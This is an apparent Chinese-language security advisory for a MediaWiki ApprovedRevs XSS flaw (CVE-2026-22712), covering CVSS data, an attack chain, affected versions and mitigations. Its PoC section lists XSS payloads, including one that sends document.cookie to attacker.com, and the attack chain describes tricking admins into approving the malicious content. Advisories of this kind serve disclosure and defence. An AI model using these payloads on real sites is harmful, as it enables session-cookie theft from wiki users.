CVE-2026-22712 MediaWiki ApprovedRevs扩展输出编码漏洞

漏洞信息

漏洞编号

CVE-2026-22712

漏洞类型

输出编码/转义不当

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

MediaWiki - ApprovedRevs Extension

漏洞概述

CVE-2026-22712是MediaWiki ApprovedRevs扩展程序中的一个输出编码或转义不当漏洞。该漏洞由于ParserAfterTidy处理过程中的magic word替换机制存在缺陷，导致攻击者可以通过构造特殊的输入数据来操纵输出内容。ApprovedRevs扩展是MediaWiki的一个重要插件，用于管理页面的批准版本功能，允许用户标记和查看经过审核的内容版本。攻击者无需认证即可利用此漏洞，但需要用户交互才能触发。漏洞影响范围包括ApprovedRevs扩展的1.45、1.44、1.43和1.39版本。由于该漏洞涉及输出编码问题，攻击者可能利用此漏洞进行跨站脚本(XSS)攻击、钓鱼欺骗或植入恶意内容，对使用该扩展的MediaWiki站点造成安全风险。CVSS评分为4.3，属于中等严重程度，主要影响保密性和完整性，对机密性有低影响，对完整性有低影响，不影响可用性。

技术细节

该漏洞的根本原因在于ApprovedRevs扩展在ParserAfterTidy钩子处理过程中对magic word的替换操作缺乏适当的输出编码。ParserAfterTidy是MediaWiki解析流程中的一个关键钩子，在HTML清理完成后执行。ApprovedRevs扩展使用此钩子来处理特定的magic word标记，以便在页面中插入批准版本的相关信息。漏洞存在于输出编码环节，当扩展在替换magic word时，没有对用户可控的输入进行充分的转义或编码处理。攻击者可以通过在页面内容中注入包含特殊字符或脚本代码的输入，当该页面被标记为批准版本并显示时，恶意代码可能在用户浏览器中执行。技术层面上，攻击者需要利用ApprovedRevs扩展的输入数据操纵功能，在页面内容中注入恶意payload。由于用户交互要求，攻击通常需要诱导具有编辑权限的用户查看或处理包含恶意内容的数据包。修复方案需要在magic word替换前后对所有输出进行HTML实体编码，确保用户输入不会被解释为可执行代码。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标站点使用的MediaWiki版本和ApprovedRevs扩展版本，确认版本在受影响范围内(1.39、1.43、1.44、1.45)

STEP 2

步骤2: 构造恶意输入

攻击者在页面内容或ApprovedRevs的magic word参数中注入包含恶意脚本代码的payload，如<script>标签或事件处理器

STEP 3

步骤3: 诱导用户交互

攻击者需要诱导具有编辑或批准权限的用户查看、编辑或批准包含恶意内容的页面版本

STEP 4

步骤4: 触发ParserAfterTidy处理

当页面被解析时，ParserAfterTidy钩子处理magic word替换，此时未经过滤的恶意代码被插入到输出HTML中

STEP 5

步骤5: 批准恶意版本

如果攻击者没有直接权限，可能需要利用社会工程学手段让管理员批准包含恶意代码的版本

STEP 6

步骤6: 触发XSS执行

当其他用户访问已批准的页面时，浏览器会执行注入的恶意脚本代码，窃取会话cookie、重定向用户或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2026-22712 PoC for MediaWiki ApprovedRevs Extension -->
<!-- 利用magic word替换机制的输出编码漏洞 -->

<!-- 步骤1: 创建包含恶意payload的页面 -->
<!-- 在页面内容中注入XSS payload -->
{{#approvedrevs:some_page|<script>alert('XSS-CVE-2026-22712')</script>}}

<!-- 或使用其他编码的payload -->
{{#approvedrevs:page_name|<img src=x onerror=alert(document.cookie)>}}

<!-- 步骤2: 诱导管理员批准该版本 -->
<!-- 使用特殊的magic word语法触发漏洞 -->
{{#approvedrevs:target_page|javascript:alert('CVE-2026-22712')}}

<!-- 步骤3: 当其他用户查看批准版本时触发XSS -->
<!-- 反射型XSS payload示例 -->
{{#approvedrevs:vulnerable_page|<svg/onload=fetch('https://attacker.com/steal?c='+document.cookie)>}}

影响范围

MediaWiki ApprovedRevs Extension 1.39

MediaWiki ApprovedRevs Extension 1.43

MediaWiki ApprovedRevs Extension 1.44

MediaWiki ApprovedRevs Extension 1.45

防御指南

临时缓解措施

临时缓解措施包括：1)禁用或移除ApprovedRevs扩展直到完成安全更新；2)对使用ApprovedRevs扩展的页面实施严格的访问控制，限制谁可以创建和批准内容版本；3)启用内容安全策略(CSP)响应头以减少XSS攻击的影响；4)对所有用户输入实施严格的过滤和验证规则；5)监控和审计ApprovedRevs相关的内容变更历史；6)考虑使用WAF(Web应用防火墙)规则来检测和阻止针对该漏洞的利用尝试。在应用官方安全补丁之前，应限制该扩展的功能使用并加强监控。